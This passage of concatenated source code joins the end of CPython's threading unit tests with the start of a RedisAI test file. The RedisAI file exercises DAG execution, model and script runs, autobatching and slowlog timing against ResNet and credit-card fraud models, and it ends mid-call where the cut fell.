support.captured_output('stderr') as stderr:
thread = ThreadRunFail()
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(),
'Exception in threading.excepthook:\n')
self.assertEqual(err_str, 'threading_hook failed')
class TimerTests(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.callback_args = []
self.callback_event = threading.Event()
def test_init_immutable_default_args(self):
# Issue 17435: constructor defaults were mutable objects, they could be
# mutated via the object attributes and affect other Timer objects.
timer1 = threading.Timer(0.01, self._callback_spy)
timer1.start()
self.callback_event.wait()
timer1.args.append("blah")
timer1.kwargs["foo"] = "bar"
self.callback_event.clear()
timer2 = threading.Timer(0.01, self._callback_spy)
timer2.start()
self.callback_event.wait()
self.assertEqual(len(self.callback_args), 2)
self.assertEqual(self.callback_args, [((), {}), ((), {})])
timer1.join()
timer2.join()
def _callback_spy(self, *args, **kwargs):
self.callback_args.append((args[:], kwargs.copy()))
self.callback_event.set()
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class PyRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._PyRLock)
@unittest.skipIf(threading._CRLock is None, 'RLock not implemented in C')
class CRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._CRLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
class BarrierTests(lock_tests.BarrierTests):
barriertype = staticmethod(threading.Barrier)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
extra = {"ThreadError"}
blacklist = {'currentThread', 'activeCount'}
support.check__all__(self, threading, ('threading', '_thread'),
extra=extra, blacklist=blacklist)
class InterruptMainTests(unittest.TestCase):
def test_interrupt_main_subthread(self):
# Calling start_new_thread with a function that executes interrupt_main
# should raise KeyboardInterrupt upon completion.
def call_interrupt():
_thread.interrupt_main()
t = threading.Thread(target=call_interrupt)
with self.assertRaises(KeyboardInterrupt):
t.start()
t.join()
t.join()
def test_interrupt_main_mainthread(self):
# Make sure that if interrupt_main is called in main thread that
# KeyboardInterrupt is raised instantly.
with self.assertRaises(KeyboardInterrupt):
_thread.interrupt_main()
def test_interrupt_main_noerror(self):
handler = signal.getsignal(signal.SIGINT)
try:
# No exception should arise.
signal.signal(signal.SIGINT, signal.SIG_IGN)
_thread.interrupt_main()
signal.signal(signal.SIGINT, signal.SIG_DFL)
_thread.interrupt_main()
finally:
# Restore original handler
signal.signal(signal.SIGINT, handler)
if __name__ == "__main__":
unittest.main()
|
tests_dag.py
|
import redis
from functools import wraps
import multiprocessing as mp
from includes import *
import time
'''
python -m RLTest --test tests_dag.py --module path/to/redisai.so
'''
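# Keys in these tests carry the '{1}' hash tag (e.g. 'imagenet_model:{1}') so that,
# when run against a Redis cluster, all keys touched by a single command map to the
# same slot. DAG commands chain ops with '|>' separators; a minimal sketch of the
# shape used throughout this file (key and model names below are placeholders):
#
#   con.execute_command(
#       'AI.DAGEXECUTE', 'LOAD', '1', 'in{1}', 'PERSIST', '1', 'out{1}', '|>',
#       'AI.MODELEXECUTE', 'mymodel{1}', 'INPUTS', 1, 'in{1}', 'OUTPUTS', 1, 'out{1}')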
def skip_if_not_version(major: int = 0, minor: int = 0, patch: int = 0):
def skipper(f):
@wraps(f)
def wrapper(env, *args, **kwargs):
con = get_connection(env, '{1}')
info = con.execute_command('INFO', 'SERVER')
M, m, p = info['redis_version'].split(".")
M = int(M)
m = int(m)
p = int(p)
if (M < major) or (M == major and m < minor) or (M == major and m == minor and p < patch):
env.debugPrint("skipping {0} since this test is for version {1}.{2}.{3} and above".format(
f.__name__, major, minor, patch), force=True)
return
return f(env, *args, **kwargs)
return wrapper
return skipper
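# Usage sketch for the decorator above (placeholder test name; real usages appear
# further down in this file):
#
#   @skip_if_not_version(6, 2, 0)
#   def test_needs_redis_6_2(env):
#       ...
#
# The wrapped test returns early (i.e. is skipped) when INFO SERVER reports a
# redis_version older than the one requested.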
# change this to make inference tests longer
MAX_TRANSACTIONS=100
def test_dagrun_modelexecute_scriptexecute_resnet(env):
if (not TEST_TF or not TEST_PT):
return
if(VALGRIND):
env.debugPrint("skipping {} since it's hanging CI".format(sys._getframe().f_code.co_name), force=True)
env.skip()
con = get_connection(env, '{1}')
model_name = 'imagenet_model:{1}'
script_name = 'imagenet_script:{1}'
image_key = 'image:{1}'
temp_key1 = 'temp_key1'
temp_key2 = 'temp_key2'
class_key = 'output:{1}'
inputvar = 'images'
outputvar = 'output'
model_pb, script, labels, img = load_resnet_test_data()
ret = con.execute_command('AI.MODELSTORE', model_name, 'TF', DEVICE,
'INPUTS', 1, inputvar,
'OUTPUTS', 1, outputvar,
'BLOB', model_pb)
env.assertEqual(ret, b'OK')
ret = con.execute_command('AI.SCRIPTSTORE', script_name, DEVICE, 'ENTRY_POINTS', 4, 'pre_process_3ch', 'pre_process_4ch', 'post_process', 'ensemble', 'SOURCE', script)
env.assertEqual(ret, b'OK')
for opnumber in range(1,100):
ret = con.execute_command(
'AI.DAGEXECUTE', 'PERSIST', '1', class_key, '|>',
'AI.TENSORSET', image_key, 'UINT8', img.shape[1], img.shape[0], 3, 'BLOB', img.tobytes(), '|>',
'AI.SCRIPTEXECUTE', script_name, 'pre_process_3ch',
'INPUTS', 1, image_key,
'OUTPUTS', 1, temp_key1, '|>',
'AI.MODELEXECUTE', model_name,
'INPUTS', 1, temp_key1,
'OUTPUTS', 1, temp_key2, '|>',
'AI.SCRIPTEXECUTE', script_name, 'post_process',
'INPUTS', 1, temp_key2,
'OUTPUTS', 1, class_key
)
env.assertEqual([b'OK',b'OK',b'OK',b'OK'],ret)
ret = con.execute_command('AI.TENSORGET', class_key, 'VALUES' )
# tf model has 1001 classes [0,1000]
env.assertEqual(ret[0]>=0 and ret[0]<1001, True)
def test_dag_modelexecute_financialNet_separate_tensorget(env):
if not TEST_TF:
return
con = get_connection(env, '{1}')
model_pb, creditcard_transactions, creditcard_referencedata = load_creditcardfraud_data(
env)
model_name = 'financialNet{1}'
ret = con.execute_command('AI.MODELSTORE', model_name, 'TF', "CPU",
'INPUTS', 2, 'transaction', 'reference', 'OUTPUTS', 1, 'output', 'BLOB', model_pb)
env.assertEqual(ret, b'OK')
for tensor_number in range(1,MAX_TRANSACTIONS):
for repetition in range(1,10):
reference_tensor = creditcard_referencedata[tensor_number]
transaction_tensor = creditcard_transactions[tensor_number]
result_tensor_keyname = 'resultTensor{{1}}{}'.format(tensor_number)
reference_tensor_keyname = 'referenceTensor{{1}}{}'.format(tensor_number)
transaction_tensor_keyname = 'transactionTensor{{1}}{}'.format(tensor_number)
ret = con.execute_command('AI.TENSORSET', reference_tensor_keyname,
'FLOAT', 1, 256,
'BLOB', reference_tensor.tobytes())
env.assertEqual(ret, b'OK')
ret = con.execute_command("EXISTS {}".format(reference_tensor_keyname))
env.assertEqual(ret, 1)
ret = con.execute_command(
'AI.DAGEXECUTE', 'LOAD', '1', reference_tensor_keyname,
'PERSIST', '1', result_tensor_keyname, '|>',
'AI.TENSORSET', transaction_tensor_keyname, 'FLOAT', 1, 30,'BLOB', transaction_tensor.tobytes(), '|>',
'AI.MODELEXECUTE', model_name,
'INPUTS', 2, transaction_tensor_keyname, reference_tensor_keyname,
'OUTPUTS', 1, result_tensor_keyname,
)
env.assertEqual([b'OK',b'OK'],ret)
ret = con.execute_command("AI.TENSORGET {} META".format(
result_tensor_keyname))
env.assertEqual([b'dtype', b'FLOAT', b'shape', [1, 2]], ret)
def test_dag_modelexecute_financialNet(env):
if not TEST_TF:
return
con = get_connection(env, '{1}')
model_pb, creditcard_transactions, creditcard_referencedata = load_creditcardfraud_data(
env)
model_name = 'financialNet{1}'
ret = con.execute_command('AI.MODELSTORE', model_name, 'TF', "CPU",
'INPUTS', 2, 'transaction', 'reference', 'OUTPUTS', 1, 'output', 'BLOB', model_pb)
env.assertEqual(ret, b'OK')
for tensor_number in range(1,MAX_TRANSACTIONS):
for repetition in range(1,10):
reference_tensor = creditcard_referencedata[tensor_number]
transaction_tensor = creditcard_transactions[tensor_number]
result_tensor_keyname = 'resultTensor{{1}}{}'.format(tensor_number)
reference_tensor_keyname = 'referenceTensor{{1}}{}'.format(tensor_number)
transaction_tensor_keyname = 'transactionTensor{{1}}{}'.format(tensor_number)
ret = con.execute_command('AI.TENSORSET', reference_tensor_keyname,
'FLOAT', 1, 256,
'BLOB', reference_tensor.tobytes())
env.assertEqual(ret, b'OK')
ret = con.execute_command("EXISTS {}".format(reference_tensor_keyname))
env.assertEqual(ret, 1)
ret = con.execute_command(
'AI.DAGEXECUTE', 'LOAD', '1', reference_tensor_keyname,
'PERSIST', '1', result_tensor_keyname, '|>',
'AI.TENSORSET', transaction_tensor_keyname, 'FLOAT', 1, 30,'BLOB', transaction_tensor.tobytes(), '|>',
'AI.MODELEXECUTE', model_name,
'INPUTS', 2, transaction_tensor_keyname, reference_tensor_keyname,
'OUTPUTS', 1, result_tensor_keyname, '|>',
'AI.TENSORGET', result_tensor_keyname, 'META',
)
env.assertEqual([b'OK',b'OK',[b'dtype', b'FLOAT', b'shape', [1, 2]]], ret)
# assert that transaction tensor does not exist
ret = con.execute_command("EXISTS {}".format(transaction_tensor_keyname))
env.assertEqual(ret, 0)
# assert that result tensor exists
ret = con.execute_command("EXISTS {}".format(result_tensor_keyname))
env.assertEqual(ret, 1)
def test_dag_modelexecute_financialNet_autobatch(env):
if not TEST_TF:
return
con = get_connection(env, '{1}')
model_pb, creditcard_transactions, creditcard_referencedata = load_creditcardfraud_data(
env)
model_name = 'financialNet{1}'
ret = con.execute_command('AI.MODELSTORE', model_name, 'TF', 'CPU',
'BATCHSIZE', 2, 'MINBATCHSIZE', 2,
'INPUTS', 2, 'transaction', 'reference', 'OUTPUTS', 1, 'output',
'BLOB', model_pb)
env.assertEqual(ret, b'OK')
for tensor_number in range(1,MAX_TRANSACTIONS):
for repetition in range(1,10):
reference_tensor = creditcard_referencedata[tensor_number]
transaction_tensor = creditcard_transactions[tensor_number]
result_tensor_keyname = 'resultTensor{{1}}{}'.format(tensor_number)
reference_tensor_keyname = 'referenceTensor{{1}}{}'.format(tensor_number)
transaction_tensor_keyname = 'transactionTensor{{1}}{}'.format(tensor_number)
ret = con.execute_command('AI.TENSORSET', reference_tensor_keyname,
'FLOAT', 1, 256,
'BLOB', reference_tensor.tobytes())
env.assertEqual(ret, b'OK')
ret = con.execute_command("EXISTS {}".format(reference_tensor_keyname))
env.assertEqual(ret, 1)
def run():
con = get_connection(env, '{1}')
ret = con.execute_command(
'AI.DAGEXECUTE', 'LOAD', '1', reference_tensor_keyname, '|>',
'AI.TENSORSET', transaction_tensor_keyname, 'FLOAT', 1, 30,'BLOB', transaction_tensor.tobytes(), '|>',
'AI.MODELEXECUTE', model_name,
'INPUTS', 2, transaction_tensor_keyname, reference_tensor_keyname,
'OUTPUTS', 1, result_tensor_keyname
)
ensureSlaveSynced(con, env)
t = threading.Thread(target=run)
t.start()
ret = con.execute_command(
'AI.DAGEXECUTE', 'LOAD', '1', reference_tensor_keyname,
'PERSIST', '1', result_tensor_keyname, '|>',
'AI.TENSORSET', transaction_tensor_keyname, 'FLOAT', 1, 30,'BLOB', transaction_tensor.tobytes(), '|>',
'AI.MODELEXECUTE', model_name,
'INPUTS', 2, transaction_tensor_keyname, reference_tensor_keyname,
'OUTPUTS', 1, result_tensor_keyname, '|>',
'AI.TENSORGET', result_tensor_keyname, 'META',
)
t.join()
ensureSlaveSynced(con, env)
env.assertEqual([b'OK',b'OK',[b'dtype', b'FLOAT', b'shape', [1, 2]]], ret)
# assert that transaction tensor does not exist
ret = con.execute_command("EXISTS {}".format(transaction_tensor_keyname))
env.assertEqual(ret, 0)
# assert that result tensor exists
ret = con.execute_command("EXISTS {}".format(result_tensor_keyname))
env.assertEqual(ret, 1)
@skip_if_not_version(6, 2, 0)
def test_slowlog_time_dag_modelexecute_financialNet_autobatch(env):
if not TEST_TF:
return
con = get_connection(env, '{1}')
model_pb, creditcard_transactions, creditcard_referencedata = load_creditcardfraud_data(
env)
model_name = 'financialNet{1}'
batchsize = 2
ret = con.execute_command('AI.MODELSTORE', model_name, 'TF', 'CPU',
'BATCHSIZE', batchsize, 'MINBATCHSIZE', batchsize,
'INPUTS', 2, 'transaction', 'reference', 'OUTPUTS', 1, 'output',
'BLOB', model_pb)
env.assertEqual(ret, b'OK')
ret = con.execute_command('CONFIG', 'SET', 'slowlog-log-slower-than', '1')
env.assertEqual(ret, b'OK')
total_time = 0
abs_time = 0
for tensor_number in range(1,MAX_TRANSACTIONS):
for repetition in range(1,10):
reference_tensor = creditcard_referencedata[tensor_number]
transaction_tensor = creditcard_transactions[tensor_number]
result_tensor_keyname = 'resultTensor{{1}}{}'.format(tensor_number)
reference_tensor_keyname = 'referenceTensor{{1}}{}'.format(tensor_number)
transaction_tensor_keyname = 'transactionTensor{{1}}{}'.format(tensor_number)
ret = con.execute_command('AI.TENSORSET', reference_tensor_keyname,
'FLOAT', 1, 256,
'BLOB', reference_tensor.tobytes())
env.assertEqual(ret, b'OK')
ret = con.execute_command("EXISTS {}".format(reference_tensor_keyname))
env.assertEqual(ret, 1)
def run():
con = get_connection(env, '{1}')
ret = con.execute_command(
'AI.DAGEXECUTE', 'LOAD', '1', reference_tensor_keyname, '|>',
'AI.TENSORSET', transaction_tensor_keyname, 'FLOAT', 1, 30,'BLOB', transaction_tensor.tobytes(), '|>',
'AI.MODELEXECUTE', model_name,
'INPUTS', 2, transaction_tensor_keyname, reference_tensor_keyname,
'OUTPUTS', 1, result_tensor_keyname
)
ensureSlaveSynced(con, env)
t = threading.Thread(target=run)
start = time.time()
t.start()
ret = con.execute_command(
'AI.DAGEXECUTE', 'LOAD', '1', reference_tensor_keyname,
'PERSIST', '1', result_tensor_keyname, '|>',
'AI.TENSORSET', transaction_tensor_keyname, 'FLOAT', 1, 30,'BLOB', transaction_tensor.tobytes(), '|>',
'AI.MODELEXECUTE', model_name,
'INPUTS', 2, transaction_tensor_keyname, reference_tensor_keyname,
'OUTPUTS', 1, result_tensor_keyname, '|>',
'AI.TENSORGET', result_tensor_keyname, 'META',
)
t.join()
ensureSlaveSynced(con, env)
end = time.time()
abs_time += (end - start)*1000000
prev_total = total_time
first = 0
for command in con.execute_command('SLOWLOG', 'GET', 10): # Look for "AI.DAGEXECUTE" commands in the last 10 commands.
if command[3][0] == b"AI.DAGEXECUTE" and first == 0: # Mark the first command found.
first = command[2]
elif command[3][0] == b"AI.DAGEXECUTE": # Found the second command; add the slower of the two times to total_time.
if first > command[2]:
total_time += first
env.assertGreaterEqual((end - start)*1000000, first)
else:
total_time += command[2]
env.assertGreaterEqual((end - start)*1000000, command[2])
break
elif command[3][0] == b"SLOWLOG": # The "SLOWLOG" entry marks the previous iteration.
total_time += first # Try adding 'first'; the asserts below verify that it was actually set.
env.assertGreaterEqual((end - start)*1000000, first)
break
env.assertNotEqual(total_time, prev_total) # fail if no "AI.DAGEXECUTE" command was found in the slowlog
info = con.execute_command('AI.INFO', model_name)
financialNetRunInfo = info_to_dict(info)
env.assertTrue(0 < financialNetRunInfo['duration'])
env.assertTrue(financialNetRunInfo['duration']//batchsize <= total_time)
env.assertTrue(total_time <= abs_time)
@skip_if_not_version(6, 2, 0)
def test_slowlog_time_dag_modelexecute_financialNet_no_writes(env):
if not TEST_TF:
return
con = get_connection(env, '{1}')
model_pb, creditcard_transactions, creditcard_referencedata = load_creditcardfraud_data(
env)
model_name = 'financialNet{1}'
ret = con.execute_command('AI.MODELSTORE', model_name, 'TF', "CPU",
'INPUTS', 2, 'transaction', 'reference', 'OUTPUTS', 1,'output', 'BLOB', model_pb)
env.assertEqual(ret, b'OK')
ret = con.execute_command('CONFIG', 'SET', 'slowlog-log-slower-than', '1')
env.assertEqual(ret, b'OK')
total_time = 0
abs_time = 0
for tensor_number in range(1,MAX_TRANSACTIONS):
for repetition in range(1,10):
reference_tensor = creditcard_referencedata[tensor_number]
transaction_tensor = creditcard_transactions[tensor_number]
result_tensor_keyname = 'resultTensor{{1}}{}'.format(tensor_number)
reference_tensor_keyname = 'referenceTensor{{1}}{}'.format(tensor_number)
transaction_tensor_keyname = 'transactionTensor{{1}}{}'.format(tensor_number)
ret = con.execute_command('AI.TENSORSET', reference_tensor_keyname,
'FLOAT', 1, 256,
'BLOB', reference_tensor.tobytes())
env.assertEqual(ret, b'OK')
ret = con.execute_command("EXISTS {}".format(reference_tensor_keyname))
env.assertEqual(ret, 1)
start = time.time()
ret = con.execute_command(
'AI.DAGEXECUTE', 'LOAD', '1', reference_tensor_keyname, '|>',
'AI.TENSORSET', transaction_tensor_keyname, 'FLOAT', 1, 30,'BLOB', transaction_tensor.tobytes(), '|>',
'AI.MODELEXECUTE', model_name,
'INPUTS', 2, transaction_tensor_keyname, reference_tensor_keyname,
'OUTPUTS', 1, result_tensor_keyname, '|>',
'AI.TENSORGET',result_tensor_keyname, 'META', '|>',
'AI.TENSORGET', result_tensor_keyname, 'VALUES'
)
end = time.time()
abs_time += (end - start)*1000000
prev_total = total_time
for command in con.execute_command('SLOWLOG', 'GET', 10):
if command[3][0] == b"AI.DAGEXECUTE":
total_time += command[2]
env.assertTrue((end - start)*1000000 >= command[2])
break
env.assertNotEqual(total_time, prev_total)
info = con.execute_command('AI.INFO', model_name)
financialNetRunInfo = info_to_dict(info)
env.assertTrue(0 < financialNetRunInfo['duration'])
env.assertTrue(financialNetRunInfo['duration'] <= total_time)
env.assertTrue(total_time <= abs_time)
def test_dag_modelexecute_financialNet_no_writes(env):
if not TEST_TF:
return
con = get_connection(env, '{1}')
model_pb, creditcard_transactions, creditcard_referencedata = load_creditcardfraud_data(
env)
model_name = 'financialNet{1}'
ret = con.execute_command('AI.MODELSTORE', model_name, 'TF', "CPU",
'INPUTS', 2, 'transaction', 'reference', 'OUTPUTS', 1,'output', 'BLOB', model_pb)
env.assertEqual(ret, b'OK')
for tensor_number in range(1,MAX_TRANSACTIONS):
for repetition in range(1,10):
reference_tensor = creditcard_referencedata[tensor_number]
transaction_tensor = creditcard_transactions[tensor_number]
result_tensor_keyname = 'resultTensor{{1}}{}'.format(tensor_number)
reference_tensor_keyname = 'referenceTensor{{1}}{}'.format(tensor_number)
transaction_tensor_keyname = 'transactionTensor{{1}}{}'.format(tensor_number)
ret = con.execute_command('AI.TENSORSET', reference_tensor_keyname,
'FLOAT', 1, 256,
'BLOB', reference_tensor.tobytes())
env.assertEqual(ret, b'OK')
ret = con.execute_command("EXISTS {}".format(reference_tensor_keyname))
env.assertEqual(ret, 1)
ret = con.execute_command(
'AI.DAGEXECUTE', 'LOAD', '1', reference_tensor_keyname, '|>',
'AI.TENSORSET', transaction_tensor_keyname, 'FLOAT', 1, 30,'BLOB', transaction_tensor.tobytes(), '|>',
'AI.MODELEXECUTE', model_name,
'INPUTS', 2, transaction_tensor_keyname, reference_tensor_keyname,
'OUTPUTS', 1, result_tensor_keyname, '|>',
'AI.TENSORGET',result_tensor_keyname, 'META', '|>',
'AI.TENSORGET', result_tensor_keyname, 'VALUES'
)
env.assertEqual(4, len(ret))
env.assertEqual([b'OK', b'OK'], ret[:2])
env.assertEqual([b'dtype', b'FLOAT', b'shape', [1, 2]], ret[2])
values = ret[3]
# Assert that resulting classification is within [0,1]
env.assertEqual(True, 0 <= float(values[0]) <= 1)
env.assertEqual(True, 0 <= float(values[1]) <= 1)
# assert that transaction tensor does not exist
ret = con.execute_command("EXISTS {}".format(transaction_tensor_keyname))
env.assertEqual(ret, 0)
# assert that result tensor does not exist (it was not persisted)
ret = con.execute_command("EXISTS {}".format(result_tensor_keyname))
env.assertEqual(ret, 0)
def test_dagro_modelexecute_financialNet_no_writes_multiple_modelruns(env):
if not TEST_TF:
return
con = get_connection(env, '{1}')
model_pb, creditcard_transactions, creditcard_referencedata = load_creditcardfraud_data(
env)
model_name = 'financialNet_no_writes{1}'
ret = con.execute_command('AI.MODELSTORE', model_name, 'TF', "CPU",
'INPUTS', 2, 'transaction', 'reference', 'OUTPUTS', 1, 'output', 'BLOB', model_pb)
env.assertEqual(ret, b'OK')
for tensor_number in range(1,MAX_TRANSACTIONS+1):
for repetition in range(1,11):
reference_tensor = creditcard_referencedata[tensor_number-1]
transaction_tensor = creditcard_transactions[tensor_number-1]
result_tensor_keyname = 'resultTensor{{1}}{}'.format(tensor_number)
reference_tensor_keyname = 'referenceTensor{{1}}{}'.format(tensor_number)
transaction_tensor_keyname = 'transactionTensor{{1}}{}'.format(tensor_number)
ret = con.execute_command('AI.TENSORSET', reference_tensor_keyname,
'FLOAT', 1, 256,
'BLOB', reference_tensor.tobytes())
env.assertEqual(ret, b'OK')
ret = con.execute_command("EXISTS {}".format(reference_tensor_keyname))
env.assertEqual(ret, 1)
ret = con.execute_command(
'AI.DAGEXECUTE_RO', 'LOAD', '1', reference_tensor_keyname, '|>',
'AI.TENSORSET', transaction_tensor_keyname, 'FLOAT', 1, 30,'BLOB', transaction_tensor.tobytes(), '|>',
'AI.MODELEXECUTE', model_name,
'INPUTS', 2, transaction_tensor_keyname, reference_tensor_keyname,
'OUTPUTS', 1, result_tensor_keyname, '|>',
'AI.TENSORGET', result_tensor_keyname, 'META', 'VALUES', '|>',
'AI.MODELEXECUTE', model_name,
'INPUTS', 2, transaction_tensor_keyname, reference_tensor_keyname,
'OUTPUTS', 1, result_tensor_keyname, '|>',
'AI.TENSORGET', result_tensor_keyname, 'META', 'VALUES',
)
env.assertEqual(5, len(ret))
env.assertEqual([b'OK', b'OK'], ret[:2])
env.assertEqual([b'dtype', b'FLOAT', b'shape', [1, 2]], ret[2][:4])
env.assertEqual(b'OK', ret[3])
env.assertEqual([b'dtype', b'FLOAT', b'shape', [1, 2]], ret[4][:4])
for _, dtype, _, shape, _, values in [ret[2], ret[4]]:
# Assert that resulting classification is within [0,1]
env.assertEqual(True, 0 <= float(values[0]) <= 1)
env.assertEqual(True, 0 <= float(values[1]) <= 1)
info = con.execute_command('AI.INFO', model_name)
financialNetRunInfo = info_to_dict(info)
env.assertEqual(model_name, financialNetRunInfo['key'])
env.assertEqual('MODEL', financialNetRunInfo['type'])
env.assertEqual('TF', financialNetRunInfo['backend'])
# Commented out due to: 'ascii' codec can't encode character '\u274c' in position 8: ordinal not in range(128)
# env.assertEqual(DEVICE, financialNetRunInfo['device'])
env.assertTrue(financialNetRunInfo['duration'] > 0)
env.assertEqual(2*MAX_TRANSACTIONS*10, financialNetRunInfo['samples'])
env.assertEqual(2*MAX_TRANSACTIONS*10, financialNetRunInfo['calls'])
env.assertEqual(0, financialNetRunInfo['errors'])
con.execute_command('AI.INFO', model_name, 'RESETSTAT')
info = con.execute_command('AI.INFO', model_name)
financialNetRunInfo = info_to_dict(info)
env.assertEqual(model_name, financialNetRunInfo['key'])
env.assertEqual('MODEL', financialNetRunInfo['type'])
env.assertEqual('TF', financialNetRunInfo['backend'])
# Commented out due to: 'ascii' codec can't encode character '\u274c' in position 8: ordinal not in range(128)
# env.assertEqual(DEVICE, financialNetRunInfo['device'])
env.assertEqual(0, financialNetRunInfo['duration'])
env.assertEqual(0, financialNetRunInfo['samples'])
env.assertEqual(0, financialNetRunInfo['calls'])
env.assertEqual(0, financialNetRunInfo['errors'])
def test_dagexecute_modelexecute_multidevice_resnet(env):
if (not TEST_TF or not TEST_PT):
return
con = get_connection(env, '{1}')
model_name_0 = 'imagenet_model1:{1}'
model_name_1 = 'imagenet_model2:{1}'
script_name = 'imagenet_script:{1}'
image_key = 'image:{1}'
temp_key1 = 'temp_key1:{1}'
temp_key2_0 = 'temp_key2_0'
temp_key2_1 = 'temp_key2_1'
class_key_0 = 'output0:{1}'
class_key_1 = 'output1:{1}'
inputvar = 'images'
outputvar = 'output'
model_pb, script, labels, img = load_resnet_test_data()
device_0 = 'CPU:1'
device_1 = DEVICE
ret = con.execute_command('AI.MODELSTORE', model_name_0, 'TF', device_0,
'INPUTS', 1, inputvar,
'OUTPUTS', 1, outputvar,
'BLOB', model_pb)
env.assertEqual(ret, b'OK')
ensureSlaveSynced(con, env)
ret = con.execute_command('AI.MODELSTORE', model_name_1, 'TF', device_1,
'INPUTS', 1, inputvar,
'OUTPUTS', 1, outputvar,
'BLOB', model_pb)
env.assertEqual(ret, b'OK')
ensureSlaveSynced(con, env)
ret = con.execute_command('AI.SCRIPTSTORE', script_name, device_0, 'ENTRY_POINTS', 4, 'pre_process_3ch', 'pre_process_4ch', 'post_process', 'ensemble', 'SOURCE', script)
env.assertEqual(ret, b'OK')
ensureSlaveSynced(con, env)
check_error_message(env, con, "INPUT key cannot be found in DAG",
'AI.DAGEXECUTE', 'ROUTING', image_key, '|>', 'AI.SCRIPTEXECUTE', script_name, 'pre_process_3ch',
'INPUTS', 1, image_key, 'OUTPUTS', 1, temp_key1)
check_error_message(env, con, "INPUT key cannot be found in DAG",
'AI.DAGEXECUTE', 'ROUTING', image_key, '|>', 'AI.MODELEXECUTE', model_name_0,
'INPUTS', 1, image_key, 'OUTPUTS', 1, temp_key1)
ret = con.execute_command('AI.DAGEXECUTE',
'ROUTING', '{1}','|>',
'AI.TENSORSET', image_key, 'UINT8', img.shape[1], img.shape[0], 3, 'BLOB', img.tobytes(),'|>',
'AI.SCRIPTEXECUTE', script_name, 'wrong_fn',
'INPUTS', 1, image_key,
'OUTPUTS', 1, temp_key1)
env.assertEqual(b'OK', ret[0])
env.assertEqual(type(ret[1]), redis.exceptions.ResponseError)
env.assertEqual("Function does not exist: wrong_fn", ret[1].__str__())
check_error_message(env, con, "Number of keys given as INPUTS here does not match model definition",
'AI.DAGEXECUTE', 'ROUTING', '{1}',
'|>', 'AI.TENSORSET', image_key, 'UINT8', img.shape[1], img.shape[0], 3, 'BLOB', img.tobytes(),
'|>',
'AI.SCRIPTEXECUTE', script_name, 'pre_process_3ch',
'INPUTS', 1, image_key,
'OUTPUTS', 1, temp_key1, '|>',
'AI.MODELEXECUTE', model_name_0,
'INPUTS', 2, temp_key1, temp_key1,
'OUTPUTS', 1, temp_key2_0)
ret = con.execute_command(
'AI.DAGEXECUTE',
'PERSIST', '2', class_key_0, class_key_1, '|>',
'AI.TENSORSET', image_key, 'UINT8', img.shape[1], img.shape[0], 3, 'BLOB', img.tobytes(),
'|>',
'AI.SCRIPTEXECUTE', script_name, 'pre_process_3ch',
'INPUTS', 1, image_key,
'OUTPUTS', 1, temp_key1,
'|>',
'AI.MODELEXECUTE', model_name_0,
'INPUTS', 1, temp_key1,
'OUTPUTS', 1, temp_key2_0,
'|>',
'AI.MODELEXECUTE', model_name_1,
'INPUTS', 1, temp_key1,
'OUTPUTS', 1, temp_key2_1,
'|>',
'AI.SCRIPTEXECUTE', script_name, 'post_process',
'INPUTS', 1, temp_key2_0,
'OUTPUTS', 1, class_key_0,
'|>',
'AI.SCRIPTEXECUTE', script_name, 'post_process',
'INPUTS', 1, temp_key2_1,
'OUTPUTS', 1, class_key_1
)
env.assertEqual([b'OK', b'OK', b'OK', b'OK', b'OK', b'OK'], ret)
ensureSlaveSynced(con, env)
ret = con.execute_command('AI.TENSORGET', class_key_0, 'VALUES' )
# tf model has 1001 classes [0,1000]
env.assertEqual(ret[0]>=0 and ret[0]<1001, True)
ret = con.execute_command('AI.TENSORGET', class_key_1, 'VALUES' )
env.assertEqual(ret[0]>=0 and ret[0]<1001, True)
def test_dagexecute_modelexecute_multidevice_resnet_ensemble_alias(env):
if (not TEST_TF or not TEST_PT):
return
con = get_connection(env, '{1}')
model_name_0 = 'imagenet_model1:{1}'
model_name_1 = 'imagenet_model2:{1}'
script_name_0 = 'imagenet_script1:{1}'
script_name_1 = 'imagenet_script2:{1}'
inputvar = 'images'
outputvar = 'output'
image_key = 'image:{1}'
temp_key1 = 'temp_key1:{1}'
temp_key2_0 = 'temp_key2_0'
temp_key2_1 = 'temp_key2_1'
class_key_0 = 'output0:{1}'
class_key_1 = 'output1:{1}'
model_pb, script, labels, img = load_resnet_test_data()
device_0 = 'CPU:1'
device_1 = DEVICE
ret = con.execute_command('AI.MODELSTORE', model_name_0, 'TF', device_0,
'INPUTS', 1, inputvar,
'OUTPUTS', 1, outputvar,
'BLOB', model_pb)
env.assertEqual(ret, b'OK')
ensureSlaveSynced(con, env)
ret = con.execute_command('AI.MODELSTORE', model_name_1, 'TF', device_1,
'INPUTS', 1, inputvar,
'OUTPUTS', 1, outputvar,
'BLOB', model_pb)
env.assertEqual(ret, b'OK')
ensureSlaveSynced(con, env)
ret = con.execute_command('AI.SCRIPTSTORE', script_name_0, device_0, 'ENTRY_POINTS', 4, 'pre_process_3ch', 'pre_process_4ch', 'post_process', 'ensemble', 'SOURCE', script)
env.assertEqual(ret, b'OK')
ensureSlaveSynced(con, env)
ret = con.execute_command('AI.SCRIPTSTORE', script_name_1, device_1, 'ENTRY_POINTS', 4, 'pre_process_3ch', 'pre_process_4ch', 'post_process', 'ensemble', 'SOURCE', script)
env.assertEqual(ret, b'OK')
ensureSlaveSynced(con, env)
# Cannot persist class_key_1
check_error_message(env, con, "PERSIST key cannot be found in DAG",
'AI.DAGEXECUTE',
'PERSIST', '2', class_key_0, class_key_1, '|>',
'AI.TENSORSET', image_key, 'UINT8', img.shape[1], img.shape[0], 3, 'BLOB', img.tobytes(),
'|>',
'AI.SCRIPTEXECUTE', script_name_0, 'pre_process_3ch',
'INPUTS', 1, image_key,
'OUTPUTS', 1, temp_key1,
'|>',
'AI.MODELEXECUTE', model_name_0,
